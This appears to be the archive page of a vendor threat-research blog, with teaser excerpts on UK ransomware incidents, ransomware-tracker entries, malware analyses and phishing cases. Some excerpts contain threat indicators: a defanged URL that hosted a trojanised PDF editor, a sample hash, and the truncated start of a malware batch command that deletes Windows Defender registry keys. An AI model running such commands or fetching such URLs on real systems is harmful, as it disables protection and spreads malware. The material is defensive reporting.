Secplicity Blog

4 Major UK CyberAttacks and the Year Isn’t Over Yet

Martin Lethbridge — Fri, 19 Sep 2025 15:12:02 -0700

Cyberattacks have become the new normal, but 2025 has been particularly brutal for UK businesses. We’re not even through the year, and already four major incidents have shaken industries, disrupted communities, and forced us to think harder about how we deal with cyber threats. Here’s what’s happened so far and what we can learn from it. 1. KNP A 150-Year Legacy Cut Short KNP was hit by ransomware that started with a weak one-week password. That small gap in security opened the door for attackers, who were then able to lock the company’s systems for a week. The downtime was so damaging that

No More Ransom: The UK’s New Cybersecurity Rules Mark a Global Shift

Oli Venn — Thu, 18 Sep 2025 08:39:22 -0700

The UK has taken one of the most decisive steps yet in the global fight against ransomware. Following a summer of attacks that disrupted healthcare, retail, and legal services, the government has confirmed that a targeted ban on ransom payments and a universal reporting requirement will become law. What the Policy Includes Ban on ransom payments: Public sector organisations and operators of Critical National Infrastructure (CNI) will be prohibited from paying ransoms. The NHS alone has faced over 1,300 attempted ransomware intrusions in the past 12 months, according to government data

Cyberattacks Are Coming Thick and Fast – M&S, Now Jaguar Land Rover… Who’s Next?

Martin Lethbridge — Mon, 08 Sep 2025 11:15:48 -0700

First it was Marks & Spencer. Then the Co-op and Harrods. Now the UK’s biggest carmaker, Jaguar Land Rover, has been hit by a cyber incident that has knocked out production lines and disrupted sales right at one of the busiest times of the year. It feels like these attacks are no longer isolated events. They are coming thick and fast, striking some of Britain’s most recognisable brands in quick succession. From Retail to the Factory Floor Back in April, Marks & Spencer was brought to its knees by a ransomware attack. Contactless payments stopped working, online orders went offline, and Click &

Cyber Crime Campaign for AppSuite PDF Editor

Kristen Yang — Fri, 29 Aug 2025 16:00:00 -0700

WatchGuard has recently received reports of a cyber crime campaign underway where a weaponized version of a free PDF editor software “AppSuite PDF Editor” has been distributed to multiple sites for users to unknowingly download and run on their systems. It has been made aware of that the threat actor used Google advertising to promote this software for users to download. It was recently observed that the following URL was used to host the malicious file: hxxps[:]//pdfadmin[.]com/productivity/download/90153768[?]cid[=]G4FTU85NWQ9Kc6z3zN where the user would then launch a .msi file named

Why Are We Still Reusing Passwords? KNP's Collapse Is a Brutal Reminder

Martin Lethbridge — Thu, 24 Jul 2025 07:59:23 -0700

Let’s stop pretending this is new. It is 2025. We have had years, decades of advice, warnings, and horror stories about password security. And still, people are reusing passwords like it is 2005. We are not talking about random Internet users, either. We are talking about businesses, infrastructure, leadership teams, and real people making real decisions that affect livelihoods. The collapse of KNP, a 158-year-old UK transport firm, should be the final wake-up call. One reused password. One guessed login. Ransomware hit. Seven hundred people out of work. Finished. You can read it for yourself

Configuration of IT-Security solutions matter – and sometimes a single parameter can cause big trouble

Jonas Spieckermann — Wed, 02 Jul 2025 11:32:58 -0700

Sometimes supposedly small things make a huge difference. This can also be true in cyber security configurations. In recent weeks, multiple partners described very similar cyber attacks their customers faced, and in some cases, the criminals were unfortunately even successful in compromising customer networks. Specifically speaking, cyber criminals first exfiltrated and then encrypted data with Akira ransomware. Akira ransomware is already out in the wild since march 2023 and many companies fell victim (Cisa has published a very detailled description and also many helpful recommendations in

Why Many Companies Still Use WPA2 And Why It's Time to Move On

Martin Lethbridge — Fri, 20 Jun 2025 04:49:54 -0700

In the ever-evolving world of cybersecurity, one area that often gets overlooked is Wi-Fi security. Despite major advances, a surprising number of companies still rely on WPA2 (Wi-Fi Protected Access 2) to secure their wireless networks. As of 2024, approximately 60% of companies continue to use WPA2, while only around 40% have made the shift to WPA3, the latest and more secure standard. WPA2: Still Prevalent, But Showing Its Age Introduced in 2004, WPA2 has been the gold standard for Wi-Fi security for well over a decade. When properly configured ‒ especially in its Enterprise version ‒ it

Ransomware Tracker (Entry #258): NailaoLocker

Ryan Estes — Wed, 18 Jun 2025 20:16:29 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/nailaolocker Analysis for NailaoLocker was first unveiled by researchers from the Orange Cyberdefense CERT and Trend Micro in mid-February 2025. In addition to a technical analysis of the NailaoLocker, it also included analyses of a remote access tool (RAT) called PlugX and a modular backdoor called ShadowPad. Both of these tools have a history of preceding intrusions from Chinese-based actors. Hence, the attribution to China. Between June and October 2024, Orange Cyberdefense research revealed a campaign, dubbed Green

Encrypted Client Hello

Brendan Patterson — Thu, 12 Jun 2025 07:42:05 -0700

What is Encrypted Client Hello? Encrypted Client Hello (ECH) is a TLS protocol extension that encrypts the initial "Client Hello" message in the TLS handshake, concealing the domain name a user is trying to access from network observers, enhancing privacy and security. This article explains this TLS protocol extension and the impact it has on the content filtering settings on your network security devices.

M&S and Co-op Under Siege: What These Cyber Attacks Teach Us

Oli Venn — Wed, 14 May 2025 13:41:24 -0700

The past few weeks have sent ripples of concern through the UK Retail landscape as giants Marks & Spencer (M&S) and the Co-operative Group (Co-op) found themselves battling significant cyber attacks. These attacks have caused significant operational disruption, with M&S suspending online orders and both retailers experiencing stock availability issues. M&S confirmed that hackers accessed personal customer data including names, contact details, dates of birth, and online order history, but not usable payment information or passwords. Similarly, the Co-op reported that hackers accessed members'

AsyncRAT Phishing Campaign Targeting Hotel Staff

Marc Laliberte — Fri, 18 Apr 2025 12:45:14 -0700

At the beginning of April, WatchGuard received a report from a customer in the hospitality business describing a new phishing campaign targeting their staff. The attack starts with the threat actor opening a reservation request with the hotel, which they then cancel by email, citing a bad review for the hotel. In the cancellation email, the attackers include a link to what they claim is the bad review, but which is actually the start of a carefully crafted malware attack that leverages living-off-the-land techniques to evade detection to install the AsyncRAT remote access trojan. The link in

Code Red (2001): The Worm That Defaced Websites

The Editor — Mon, 07 Apr 2025 13:04:12 -0700

While the world was captivated by the first Harry Potter movie, cybercriminals were busy launching one of the first major web server worms. What Was Happening in the World: The 9/11 attacks in the United States profoundly shifted global security policies, increasing focus on cybersecurity and national defense. In the meantime, the United States was preparing for military action in Afghanistan in response to terrorist threats. Euro currency had been introduced in electronic form, changing the financial landscape in Europe. In sports, Brazil won the Copa América 2001, and the world was preparing

Ransomware Tracker (Entry #242): Yashma

Ryan Estes — Tue, 01 Apr 2025 15:45:48 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/yashma Note: This page is dedicated to the Yashma (Chaos v6.0) ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 , Chaos v2.0 , Chaos v3.0 , Chaos v4.0 , and Chaos v5.0 entries. Note: Two decryptors exist for Yashma, including the original decryptor from Truesec. See below. The Yashma builder is a fork of the Chaos v5.0 builder with very minor differences. They are: The

Ransomware Tracker (Entry #241): Chaos v5.0

Ryan Estes — Tue, 01 Apr 2025 15:45:47 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v50 Note: This page is dedicated to the Chaos v5.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 , Chaos v2.0 , Chaos v3.0 , and Chaos v4.0 entries. Note: A decryptor exists for Chaos v3.0 through Yashma. See below. The Chaos v5.0 builder expands on the Chaos v4.0 builder with only minor differences. They are: The encryption algorithm now allows users to encrypt

Ransomware Tracker (Entry #240): Chaos v4.0

Ryan Estes — Tue, 01 Apr 2025 15:45:46 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v40 Note: This page is dedicated to the Chaos v4.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 , Chaos v2.0 , and Chaos v3.0 entries. Note: A decryptor exists for Chaos v3.0 through Yashma. See below. The Chaos v4.0 builder expands on the Chaos v3.0 builder with similar functionalities. Here are the main differences: The encryption algorithm now allows users to

Ransomware Tracker (Entry #239): Chaos v3.0

Ryan Estes — Tue, 01 Apr 2025 15:45:45 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v30 Note: This page is dedicated to the Chaos v3.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 and Chaos v2.0 entries. Note: A decryptor exists for Chaos v3.0 through Yashma. See below. The Chaos v3.0 builder is similar to Chaos v2.0. However, this is the first iteration of Chaos that truly encrypts files instead of only wiping them. Here are the main

Ransomware Tracker (Entry #238): Chaos v2.0

Ryan Estes — Tue, 01 Apr 2025 15:45:44 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v20 Note: This page is dedicated to the Chaos v2.0 ransomware builder and does not reflect any encryptors created from the builder. Note: This is the second iteration of the Chaos ransomware builder series. For preliminary information, see the Chaos v1.0 entry. The Chaos v2.0 builder is similar to Chaos v1.0. It still wipes all the files by overwriting them with randomly generated data. However, it differs in a few subtle ways: The builder is officially renamed Chaos Ransomware Builder instead of Ryuk.NET Ransomware

Ransomware Tracker (Entry #237): Chaos v1.0

Ryan Estes — Tue, 01 Apr 2025 15:45:43 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/chaos-v10 Note: This page is dedicated to the Chaos v1.0 ransomware builder and does not reflect any encryptors created from the builder. The Chaos v1.0 builder was first seen in June 2021 when a user named ryukRans on the XSS forum advertised it for the first time using the name Ryuk.NET. They likely chose this name because of the infamous popularity of the Ryuk name that began at the time of this builder's inception. However, after analyzing this builder, and based on various researcher accounts, the encryptors produced

Ransomware Tracker (Entry #234): 0mid16B

Ryan Estes — Sat, 29 Mar 2025 12:11:04 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/0mid16B 0mid16B is a Singaporean national living in Thailand who was arrested in February 2025. It was not a "group," as the individual who ran the operation often claimed. He would use an alias and then change his name on forums and marketplaces to mask his identity. However, many researchers, primarily Group-IB and DataBreaches.net, knew this was the same individual based on his writing style and format of posts. Over the few years he was active, he went by Chaoscc, DESORDEN, ALTDOS, GHOSTR, 0mid16B, and CrowdStrike gave

ILOVEYOU (2000): When Love Was a Virus (Literally)

The Editor — Wed, 26 Mar 2025 09:39:42 -0700

In 2000, the world dodged the feared Y2K bug, avoiding major technological disruptions. The dot-com bubble was still inflating, with Internet companies booming, while France celebrated its recent victory in the 1998 FIFA World Cup. As the world looked ahead to the Sydney Olympics, mobile phones became more accessible, with the Nokia 3310 and its iconic Snake game rising in popularity. Meanwhile, Britney Spears dominated the music charts with Oops!... I Did It Again, setting the tone for a rapidly evolving digital era. But that year, love was in the air... and in emails. The Attack: ILOVEYOU

Ransomware Tracker (Entry #231): WAGNER

Ryan Estes — Wed, 19 Mar 2025 08:30:10 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/wagner-0 WAGNER ransomware claims to be the "official virus of PMC Wagner on employment." PMC stands for Private Military Company, and Wagner is a PMC backed by the Russian government. They are more commonly referred to as the Wagner Group. On February 24, 2022, Russia invaded Ukraine, and Russia's president, Vladimir Putin, called it a special military operation (SMO). In addition to Russian military forces, the Wagner Group was intertwined in this invasion. Several months after Ukraine defiantly thwarted the invasion to a

Ransomware Tracker (Entry #229): Hakuna Matata 1.7

Ryan Estes — Thu, 13 Mar 2025 15:55:41 -0700

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/hakuna-matata Hakuna Matata is a Swahili phrase meaning "there are no worries" (Hakuna = there are no; Matata = worries). It's popularized by the Disney movie The Lion King, performed by Timon and Pumbaa. However, native speakers of Swahili in countries such as Tanzania, Kenya, Uganda, and other neighboring countries seldom use this phrase in everyday conversation. It's more or less reserved for tourists because of The Lion King. In this context, Hakuna Matata is a ransomware builder that produces encryptors with AES-256

Ransomware Tracker (Entry #226): Bagli

Ryan Estes — Sat, 08 Mar 2025 15:36:51 -0800

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/bagli Bagli is commonly called Bagli Wiper because it doesn't actually encrypt files; it overrides the file's bytes with the Random() function (.NET). Therefore, it's technically not ransomware; it's pseudo-ransomware as a wiper. Although a ransom note—oxu.txt—is dropped that demands a ransom of $350 in Bitcoin, there is no possible way to recover files. The ransom note is in Azerbaijani, and the wiper's creator, ryukRans, spoke primarily Russian on XSS.is (a hacking forum). Therefore, we denoted the user as Azerbaijani

Ransomware Tracker (Entry #222): Mike Tyson

Ryan Estes — Wed, 05 Mar 2025 20:11:44 -0800

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/mike-tyson Mike Tyson ransomware, dubbed "Tyson" for short, is a variant of the Chaos ransomware family and obviously refers to the boxer Mike Tyson. Derivatives of Chaos are created using the Chaos Ransomware builders, of which there are six primary versions (including Yashma, traditionally referred to as version 6). This variant is believed to be from Chaos 5.0, specifically Chaos 5.2. The determination for this is that it can change the desktop wallpaper, which is applicable for only version 4.0 and beyond, and it

Ransomware Tracker (Entry #216): AzzaSec

Ryan Estes — Sun, 23 Feb 2025 18:17:39 -0800

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/azzasec AzzaSec (AzzaSecurity) is both the name of the ransomware and of an Italian hacktivist group. That is based on research from Threatmon, which wrote an extensive report on this ransomware and its members. The other two members are Turkish (WalterBishop_AzzaSec) and Brazilian (DmitryRansom). However, the leader—madoneputain/Friendied—is Italian. The group was first observed in late February 2024 and disbanded in August of the same year. During this time, they created ransomware with the same name as their group, but

Ransomware Tracker (Entry #215): Anonymous

Ryan Estes — Sun, 23 Feb 2025 18:17:38 -0800

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/anonymous Anonymous ransomware is built from the NoCry ransomware builder, based on the infamous WannaCry ransomware. This is evident from the debug string in the discovered sample (C:\Users\Anonymous\Desktop\NoCry Builder + Source Code + Exploit Jpeg\Anonymous Encrypter SCR\ransomeware\obj\Debug\Anonymous.pdb). This ransomware shares similarities with others, such as BlackSkull, GhosHacker, and AzzaSec. There's a direct correlation to AzzaSec in the metadata of that ransomware, suggesting that this is an early iteration of

Ransomware Tracker (Entry #214): GhosHacker

Ryan Estes — Sun, 23 Feb 2025 18:17:35 -0800

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/ghoshacker GhosHacker, which is seemingly a misspelling of GhostHacker based on the ransom note dropped with the same name—GhostHacker.exe—is a crypto-ransomware built from the NoCry ransomware builder. This allegation comes from the debug string of another similar variant named Anonymous, which shares all of the same characteristics as this ransomware and others such as BlackSkull and AzzaSec. These variants are almost the same, indicating they are all based on NoCry. It appears they all are possibly from the same threat

Ransomware Tracker (Entry #213): BlackSkull

Ryan Estes — Sun, 23 Feb 2025 18:17:33 -0800

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/blackskull BlackSkull is a near clone of GhosHacker and Anonymous and is theorized to be an early version of AzzaSec. All four of these are created from the NoCry ransomware builder, based on the infamous WannaCry ransomware. However, this ransomware poses nowhere near the threat of WannaCry. In fact, there's almost no threat to individuals or victims, considering there's only one known sample in the wild and, as was stated, was likely an earlier version of another ransomware; it's a test ransomware. When executing this

Ransomware Tracker (Entry #210): CyberVolk

Ryan Estes — Thu, 20 Feb 2025 16:29:31 -0800

Entry: https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/cybervolk CyberVolk is a self-proclaimed hacktivist group with various allegiances to other hacktivist groups throughout the globe, including Anonymous (their subsidiaries), White_Hunters, Cyber Hunters, and others. They even state they work with a DDoS service called SRV to carry out many of their extortion attacks. The group's members (many of which are listed below) carry out data breaches, website defacing, DDoS attacks, and, of course, ransomware. Before they employed ransomware in their arsenal, they were known by

Dr Joseph L Popp Jr and The First-Ever Ransomware – The AIDS Trojan

Ryan Estes — Tue, 18 Feb 2025 11:58:00 -0800

Publication: Dr. Joseph L Popp Jr and The First-Ever Ransomware – The AIDS Trojan If you work in information security or the computer science field, there's a good chance you've heard of the first-ever ransomware – the AIDS Trojan. There's also a chance you know the basics of that story. An evolutionary biologist named Joseph Popp created it in 1989 and sent thousands of 5.25-inch floppy diskettes to AIDS researchers and magazine subscribers. The ransomware instructed victims to pay $178 or $379 to a Panamanian PO Box. He acted bizarrely before his arrest and was released back to the United

Yet Another TA558 Campaign Targets South America’s Hospitality Industry With AsyncRAT

The Editor — Mon, 17 Jun 2024 13:39:28 -0700

Introduction This research began with finding a simple malware sample to extract strings for an unrelated topic. In my day-to-day malware analysis workflow, I stumbled upon a JavaScript (JS) file with what I would call trivial obfuscation. I knew it was malware but wanted to understand the infection chain. After some cleanup, I understood it to be a downloader of an additional malicious script. This time, a PowerShell script obscured to look like a PDF hosted on what appeared to be a compromised or hijacked domain. This PDF dropped two files, one being a helper DLL and the other being AsyncRAT

Operation Cronos: A Breakdown of the LockBit Disruption

The Editor — Mon, 26 Feb 2024 08:57:21 -0800

Check out LockBit 3.0 on our new Ransomware Tracker Beta! Hear more about Operation Cronos on The 443 Podcast . If you've followed the ransomware space for the past few years, it's very likely you've heard of LockBit. If you don't follow the cybersecurity landscape, there's still a good chance you've heard of them or at least their operations. The group's affiliates have been in headline after headline after headline after headline. In the past few months alone, affiliates have breached ICBC, exfiltrated data from Boeing, and demanded the third largest ransom ever - $80 million – from CDW. To

AnyDesk Remote Access Vendor Compromise

The Editor — Mon, 12 Feb 2024 07:17:49 -0800

On February 2nd, remote access software vendor AnyDesk disclosed they had been the victim of a cyberattack where an unknown threat actor obtained access to production systems. AnyDesk appears to have contained the incident before the adversaries were able to leverage their access into a supply chain attack against AnyDesk customers but out of an abundance of caution, they proactively revoked all security-related certificates including their code signing certificates for the AnyDesk application. AnyDesk also forced a password reset for all customers on their my.anydesk.com management portal as

Scratching the Surface of Rhysida Ransomware

The Editor — Tue, 23 May 2023 00:35:18 -0700

A few days ago, I was scrolling through Twitter and came across a post by the MalwareHunterTeam briefly discussing a new Ransomware group - Rhysida. A lack of results from a Google search shows this is a newer group prepping to start operations. I grabbed a sample and downloaded it, and the executable confirmed that this group is indeed in its early stages based on the breadth of print debugging and the lack of a victim target in the ransom note. This appeared to be a pre-finished test file. Here's what I found. Original File Name: fury_ctm1042.bin MD5: 0c8e88877383ccd23a755f429006b437 SHA1

Cybersecurity News: A Trio of Vulnerabilities, BreachForums Admin Arrested, Hundreds of Ransomware Victims, and The Rise of AI

The Editor — Thu, 13 Apr 2023 07:23:24 -0700

This post arrives later than usual, but as they say, "Better late than never." Researchers and the media have highlighted various unique, interesting, or destructive vulnerabilities in the last few weeks. We decided to pick three of these vulnerabilities and talk about them. One was patched with Microsoft's Patch Tuesday in March; another affects the privacy of almost everyone, and the CL0P ransomware group leveraged the third vulnerability to infect well over 100 victims. We wanted to highlight another vulnerability – BingBang – that allowed Cloud Security Researcher, Hillai Ben-Sasson, to

Cybersecurity News: Free Cybersecurity Training, TrickBot Group Exposed, Major GoDaddy Breach, and Russia to Legalize cybercrime?!

The Editor — Mon, 06 Mar 2023 08:49:45 -0800

A new week, a new month, and a new Cybersecurity News post! This iteration contains a whopping eight (8) stories covering the last two to four weeks. Since cybersecurity is a diverse field of assorted specializations, we attempt to match that with various stories touching on all aspects of cybersecurity. This time we cover a few breaches, Elon Musk's decision to alter Twitter's multi-factor authentication policy, the TrickBot group being exposed and sanctioned, Russia wanting to legalize cybercrime formally, and more! Since this post is relatively longer than previous iterations, we've

Cybersecurity News: Automated Ransomware Attacks, U.S. No Fly List Leaked, and A.I. Detecting A.I.

The Editor — Fri, 17 Feb 2023 14:08:12 -0800

Welcome to another iteration of Cybersecurity News. The fairly new and unorthodox, semi-monthly news article that highlights a handful of noteworthy cybersecurity-related stories and provides extra references and resources to do further research if you desire. We aim to solidify a more concrete release schedule going forward and will release more information once we have it. For this post we cover six stories covering artificial intelligence, a leak of TSA's No Fly List, cryptocurrency hacks, and ransomware. First, we begin with an ongoing development on malware campaigns leveraging Microsoft

A Technical Analysis of ISAACWiper

The Editor — Fri, 10 Feb 2023 20:41:22 -0800

Shortly after Putin launched his "special military operation" in Ukraine on February 24 th, 2022, researchers from ESET published information about two novel destructive malware families – HermeticWiper and ISAACWiper. HermeticWiper was part of a three-pronged campaign that included a worm and pseudo-ransomware component known as HermeticWizard and HermeticRansom, respectively. HermeticWiper is the data-wiping component. ISAACWiper, on the other hand, was a relatively simple wiper, and some samples included debug strings exposing its capabilities to researchers. Although these two wipers

Cybersecurity News: ACLU Unveils Mass Surveillance Program, (More) Malvertising, and Breaches

The Editor — Mon, 30 Jan 2023 08:21:01 -0800

Sifting through the most recent cybersecurity-related news may seem daunting, and keeping up with the latest developments is arduous. However, the WatchGuard Threat Lab is happy to filter through the latest cybersecurity news and highlight some stories we believe are important, noteworthy, or interesting. The goal is to focus on a few recent cybersecurity-related stories, briefly discuss them, and then provide relevant references to research each topic further. Here are the reports. 1) (More) Malvertising via Google Ads Last week, we briefly discussed a noticeable increase in malvertising via

Law Enforcement Infiltrate and Seize Hive Ransomware Operation

The Editor — Thu, 26 Jan 2023 16:37:36 -0800

In a sudden, stunning announcement today, the United States Department of Justice, the FBI, and federal agencies from 13 countries from Europol, announced the seizure of the transnational Hive ransomware operation. The seizure was part of a months-long operation that began in late July 2022 when the FBI infiltrated the Hive network. Deputy Attorney General Lisa Monaco said it best: "…we hacked the hackers." Ultimately, this led to the seizure of all TOR websites, communications, and documentation held by the ransomware group. The pictures below show the current state of the Hive ransomware

Cybersecurity News: Malvertising, Ransomware, and Alleged IRS Breach

The Editor — Wed, 18 Jan 2023 11:17:35 -0800

Regarding malware, breaches, and the overall threat landscape, 2023 is off to a dynamic start. Malvertising (malicious advertising) continues to be a successful attack vector for hackers, especially from sponsored ads via Google searches. Jon DiMaggio released his long-awaited Ransomware Diary series beginning with the first iteration of the LockBit ransomware group. Also, a new group from Belarus claims to have breached the IRS, just as American citizens are beginning the tax season. Here is a snippet of the top cybersecurity stories from last week. 1. Rhadamanthys leverages malvertising A

Endurance Ransomware Claims Breach of US Federal Government

The Editor — Thu, 17 Nov 2022 12:57:55 -0800

The WatchGuard Security Team spends a lot of time chasing ransomware extortion groups throughout the dark web. So, it only fits that one of the newer ransomware extortion groups is named Endurance Ransomware. It appears this "group" is one individual known as IntelBroker, who has allegedly breached several entities of the US government and two other separate businesses in one month of existence. This post will unearth IntelBroker's Endurance Ransomware operation before it is brought to light by more destruction. On November 15th, the WatchGuard Security Team discovered a post by IntelBroker on

Over a Billion Records Leaked in Shanghai National Police Database Hack

The Editor — Fri, 08 Jul 2022 12:54:52 -0700

This past week, a hacker by the name of ChinaDan allegedly breached the Shanghai National Police (SHGA) database and has put the nearly 23 TB of data up for sale for 10 bitcoin (BTC), or a little over $200k USD as of this writing. ChinaDan claims the data contains “information on 1 Billion Chinese national residents and several billion case records” including names, addresses, birthplaces, national ID numbers, mobile numbers, and a myriad of data from police reports and criminal cases. To prove the data haul is legitimate, the hacker provided a sample size of 750k entries from three separate

LockBit Ransomware Group Introduces Bug Bounties and More

The Editor — Wed, 29 Jun 2022 14:27:06 -0700

The LockBit ransomware group has unveiled a new website – LockBit 3.0 – to host their ransom extortions and data leaks. The website includes several new features, including an unprecedented bug bounty program to assist the group in securing their site; acceptance of the privacy cryptocurrency, Zcash; and the addition of receiving payments from users to: “extend the timer for 24 hours”, “destroy all information”, and “download data at any moment”. The website wasn’t the only change from the LockBit group. Based on the new ransom note the malware drops, researchers speculate that the inner

New Oski Stealer Variant, "Mars Stealer", Targets Credentials, Crypto, and 2FA

The Editor — Tue, 08 Feb 2022 12:20:46 -0800

In early 2020, during the emergence of the COVID-19 pandemic, researchers discovered a novel malware named Oski Stealer, capable of stealing browser data such as cookies, history, payment information, and autofill information, as well as cryptocurrency wallets, login credentials of applications, and Authy 2FA information. It can also take screenshots of your desktop and perform file transfers to, and from, a C2 server. Oski performed these actions by (allegedly) gaining access to routers with weak admin passwords and modifying DNS settings to hijack Windows Network Connectivity Status

Log4j Becomes The Highest Detected Vulnerability Days After Release

The Editor — Fri, 21 Jan 2022 10:17:46 -0800

Log4Shell attacks have spread throughout the Internet due to the ease with which attackers can perform them. The WatchGuard Threat Lab sees a sample of these attacks from our customers’ perspectives when they opt to provide anonymized threat intelligence data from their Fireboxes. This limited data, along with our analysis, gives us a unique opportunity to review some of the real-world Log4j attacks happening on the Internet. We searched our data from when Log4Shell was first disclosed until now for signs of these attacks. We detected two recent vulnerabilities targeting log4j; CVE-2021-44228

Critical RCE Vulnerability in Log4J2

The Editor — Fri, 10 Dec 2021 15:53:07 -0800

[Updated 13-12-2021: Additional information for WatchGuard customers] On Thursday, security researchers disclosed a critical, unauthenticated remote code execution (RCE) vulnerability in log4j2, a popular and widely used logging library for java applications. CVE-2021-44228 is a full 10.0 on the CVSS vulnerability scoring system due to a combination of how trivial the exploit is and damaging the impact is. All versions of the log4j2 are vulnerable to varying degrees with some versions (2.10 > and <= 2.14.1) having the option to disable the vulnerable functionality and the latest version (2.15

The Evolution of Phishing: A WatchGuard Real-World Example

The Editor — Wed, 10 Nov 2021 10:47:31 -0800

Phishing is a type of social engineering attack where threat actors attempt to trick users into providing sensitive information via email. Typically, this involves creating a phishing campaign where threat actors will send the same phishing email to a large batch of recipients in an attempt to trick at least a small subset of these potential victims. Not to be confused with spear phishing which is a more targeted phishing attack via email that uses specific knowledge or details about the recipient(s) to further deceive them into providing sensitive information. Phishing is an ongoing problem

Breaking Alert: MSP Targeted Ransomware Attack (Kaseya Supply Chain Attack)

The Editor — Fri, 02 Jul 2021 15:07:33 -0700

Managed Service Providers (MSPs), especially ones using Kaseya VSA, should read this and take action as soon as possible. High-level Summary: On Friday, July 2, some MSPs using the on-premises version of Kaseya VSA suffered ransomware attacks that trickled down to their customers. Kaseya says around 1500 companies (so far), many customers of MSPs, have been affected and the attackers (Revil gang) are asking $70 million in ransom. The attack exploited unpatched vulnerabilities in the Kaseya product that Kaseya is working on fixing ASAP. Anyone using an on-premises Kaseya VSA server (does not

Deobfuscating a Dropper for a ZLoader Trojan Variant

The Editor — Thu, 01 Apr 2021 10:00:38 -0700

On March 18th, 2021, the DNSWatch Tailored Analysis Team received an email from an internal WatchGuard employee who deemed the email as suspicious. The initial email included an attachment with the title Attachment_57904. A DNSWatch Analyst performed an initial assessment of the file in search of any malicious indicators or behaviors only to discover that the file was a heavily obfuscated Visual Basic Script (.vbs). Upon this discovery, the file was securely passed on to the Panda Attestation Team for further analysis. This report documents the analysis process of this file and how, ultimately

Analysis of a Dridex Banking Trojan Phish

The Editor — Wed, 31 Mar 2021 08:59:56 -0700

At the beginning of March, as many Americans were eagerly awaiting another round of stimulus payments, news began to circulate about cybercriminals taking advantage of the American Rescue Plan offering financial assistance (payments and other aids) as part of COVID-19 relief. We got a hold of some of these phishing emails and upon scrutiny, we found the email imitates the IRS, using the official agency logo. However, closer inspection proves the sender spoofed the domain to look like it came from the IRS. We were able to associate these phishes with the banking trojan. Dridex which according

Analyzing a Fileless Malware Loader

The Editor — Thu, 15 Oct 2020 16:15:41 -0700

Thanks to WatchGuard’s Panda Adaptive Defense 360 zero-trust service, WatchGuard Threat Lab was able to identify and stop a sophisticated fileless malware loader before execution on the victim’s computer. Upon further detailed analysis by our attestation team, we identified several recent browser vulnerabilities that the malware targeted as part of its exploit chain. Malware Behavior The attack that WatchGuard Threat Lab analyzed lived fully in memory, making use of JavaScript [ T1059.007 ] and PowerShell [ T1059.001 ] to execute malicious actions. Advanced attacks like this one, that doesn’t

Identifying an Existing APT Intrusion

The Editor — Fri, 02 Oct 2020 08:29:56 -0700

Last month while onboarding a new customer to Panda EDR with the Orion threat hunting console, WatchGuard Threat Lab discovered an existing advanced persistent threat (APT) on the organization’s network. WatchGuard Threat Lab investigated the incident and were able to identify much of the threat actor’s tools, techniques and procedures including several indicators of compromise (IOCs). Threat Actor Activity Prior to WatchGuard Threat Lab identifying the breach, the threat actors obtained Valid Accounts [ T1078] including at least one Local Account [ T1078.003] and Domain Account [ T1078.002]

Catching a Rookie Mistake in a Facebook Phish

The Editor — Tue, 18 Aug 2020 16:20:42 -0700

This short post will show a real-world phish that DNSWatch caught and how analysts were able to garner further information using trivial open-source tools because of a unique mistake by the attacker.

New Research Reveals Sexist Tendencies in Facial Recognition Tech

The Editor — Wed, 08 Jul 2020 15:44:52 -0700

Recently Amazon, Microsoft, and others have taken a step back to review the use of their own face recognition software. Some users of this technology may use only face recognition to identify a person. This idea that you only need the face recognition software to identify a person doesn’t allow for errors in the programming and we all know that programs have errors. Understand the errors and how they present themselves in the program will help the person reviewing the results. Our research, published below, indicates that some face recognition software will misidentify a woman by as much as 18

MedusaLocker Ransomware Will Bypass Most Antivirus Software

The Editor — Tue, 19 May 2020 15:31:20 -0700

Last week we came across ransomware with unique evasion techniques in a new variant, or possibly a copycat, of the MedusaLocker ransomware. MedusaLocker ransomware, first seen in September 2019, came with a batch file to evade detection. Batch files contain script commands running in a Command Prompt on Windows machines and have the .bat extension. In the malicious batch file that came with the ransomware payload, we found a command that edits the Windows registry to remove Windows Defender when the computer is booted into safe mode without networking enabled (Minimal mode). reg delete HKLM

Chase Bank Scams Target Our Own

The Editor — Fri, 08 May 2020 10:04:11 -0700

The other day, a WatchGuard employee received a text alert stating that Chase bank had limited access to their account. They right away knew the message was bogus and offered it to us to investigate. We found the link within the message sends the user to a fake Chase login. Fortunately, the employee knew better and didn't follow the link in the text message, but others might not be as observant. We followed through with the phish in our test environment and found the scam could end in a takeover of the victim’s bank account. When we first visited this site in our sandbox, at first we saw

PayPal Phishing

The Editor — Mon, 04 May 2020 16:39:51 -0700

The other day, a PayPal phish made it into the inbox of my personal email. It is not normal for phishing emails to make their way past my cloud email provider’s spam filter, so I decided to spin up a sandbox just in case any malware was involved and dive in. The phishing hook in the message body wasn’t anything special. The phish masqueraded as an email from PayPal notifying me that my account access has been limited for suspicious activity. A few things about the wording of this message were obvious giveaways that the source of this message was not legitimate. First, PayPal has always

Malware Writeup: JS:Trojan:Cryxos.2550

